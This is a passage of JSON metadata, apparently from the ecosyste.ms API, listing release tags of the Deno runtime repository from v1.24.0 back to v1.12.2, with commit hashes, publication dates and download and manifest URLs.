/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747"